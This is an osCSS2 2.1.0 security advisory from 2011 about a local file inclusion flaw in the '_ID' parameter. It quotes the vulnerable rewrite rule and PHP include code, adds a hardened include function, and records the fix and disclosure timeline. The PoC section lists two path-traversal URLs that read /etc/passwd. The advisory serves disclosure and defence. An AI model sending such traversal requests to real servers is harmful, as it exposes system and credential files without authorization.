Vendor: oscss2
By: Stefan Schurtz
CVSS: 7.5 (HIGH)
CWE: 98 (Local File Inclusion)
Product Name: oscss2
Affected Version From: 2.1.2000
Affected Version To: 2.1.2000
Patch Exists: YES
Related CWE: N/A
CPE: a:oscss:oscss2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2011

osCSS2 “_ID” parameter Local file inclusion

The "_ID" parameter of osCSS2 2.1.0 is prone to a local file inclusion (LFI) vulnerability. The vulnerable code is present in the .htaccess, content.php and page.php files. The PoC exploit sends a crafted request to the target server with the _ID parameter set to a path-traversal file path, which can be used to read sensitive files from the server.

Mitigation:

Fixed in svn branch 2.1.0 and reported in develop version 2.1.1

Exploit-DB raw data:

Advisory:           osCSS2 "_ID" parameter Local file inclusion
Advisory ID:        SSCHADV2011-034
Author:             Stefan Schurtz
Affected Software:  Successfully tested on osCSS2 2.1.0 (latest version)
Vendor URL:         http://oscss.org/
Vendor Status:      Fixed in svn branch 2.1.0 and reported in develop version 2.1.1

==========================
Vulnerability Description
==========================

The "_ID" parameter of osCSS2 2.1.0 is prone to an LFI vulnerability

==========================
Vulnerable code
==========================

//.htaccess
// The request's own query string is appended after the fixed _ID value, so a
// client-supplied _ID in the query string overrides it (PHP keeps the last duplicate key).
RewriteRule ^shopping_cart.php(.{0,})$ content.php?_ID=shopping_cart.php&%{QUERY_STRING}

//content.php
// The page object derives the template path from _ID and includes it.
require($page->path_gabarit());

// includes/classes/page.php
public function pile_file_lang($path_file){
    global $lang;
    // Only prepends the catalog directory; "../" segments are never checked,
    // so a traversal path still resolves to a file outside DIR_FS_CATALOG.
    if(substr($path_file,0,strlen(DIR_FS_CATALOG)) !=DIR_FS_CATALOG) $path_file= DIR_FS_CATALOG.$path_file;

    if(!in_array($path_file,(array)$this->PileFileLang))
        include_once($path_file);
}
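A hardened counterpart to pile_file_lang(), added here as an example and not taken from osCSS2 or the advisory: it resolves the request-derived path with realpath() and refuses anything that lands outside the catalog root. It assumes DIR_FS_CATALOG is the catalog directory (a constructed value is defined only for stand-alone runs) and uses a caller-supplied array in place of $this->PileFileLang; safe_include_catalog_file is a hypothetical name.

```php
<?php
// Added example, not osCSS2 code. Constructed catalog root for stand-alone use;
// in the real application DIR_FS_CATALOG is already defined by the configuration.
if (!defined('DIR_FS_CATALOG')) {
    define('DIR_FS_CATALOG', __DIR__ . '/catalog/');
}

// Hardened counterpart of page.php's pile_file_lang(): the request-derived path
// is canonicalised and rejected unless it stays inside the catalog root and
// names a PHP template. Returns true only when the file was (or already is) loaded.
function safe_include_catalog_file(string $path_file, array &$loaded): bool
{
    $root = realpath(DIR_FS_CATALOG);
    if ($root === false) {
        return false;
    }
    // Same prefixing as the original so existing call sites keep working.
    if (strncmp($path_file, DIR_FS_CATALOG, strlen(DIR_FS_CATALOG)) !== 0) {
        $path_file = DIR_FS_CATALOG . $path_file;
    }
    // realpath() collapses "../" segments and follows symlinks, so a traversal
    // payload such as "../../../../etc/passwd" resolves outside $root (or to
    // false if the target does not exist) and fails the prefix check.
    $resolved = realpath($path_file);
    if ($resolved === false
        || strncmp($resolved, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        error_log('blocked include outside catalog root: ' . $path_file);
        return false;
    }
    // Only PHP templates are meant to be included from here.
    if (pathinfo($resolved, PATHINFO_EXTENSION) !== 'php') {
        error_log('blocked include of non-PHP file: ' . $resolved);
        return false;
    }
    if (!in_array($resolved, $loaded, true)) {
        include_once $resolved;
        $loaded[] = $resolved;
    }
    return true;
}

// Constructed demonstration: a legitimate template is loaded, while the
// advisory's traversal payload is refused before include_once() ever sees it.
$loaded = [];
@mkdir(DIR_FS_CATALOG);
file_put_contents(DIR_FS_CATALOG . 'shopping_cart.php', "<?php echo \"cart ok\\n\";\n");
var_dump(safe_include_catalog_file('shopping_cart.php', $loaded));
var_dump(safe_include_catalog_file('../../../../../../../../../../../etc/passwd', $loaded));
```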

==================
PoC-Exploit
==================

http://<target>/catalog/shopping_cart.php?_ID=../../../../../../../../../../../etc/passwd
http://<target>/catalog/content.php?_ID=../../../../../../../../../../../etc/passwd

=========
Solution
=========

Fixed in svn branch 2.1.0 and reported in develop version 2.1.1

====================
Disclosure Timeline
====================

08-Nov-2011 - informed vendor
08-Nov-2011 - release date of this security advisory

========
Credits
========

Vulnerability found and advisory written by Stefan Schurtz.

===========
References
===========

http://oscss.org/
http://forums.oscss.org/2-security/oscss2-id-parameter-local-file-inclusion-t1999.html
http://dev.oscss.org/task/892
http://www.rul3z.de/advisories/SSCHADV2011-034.txt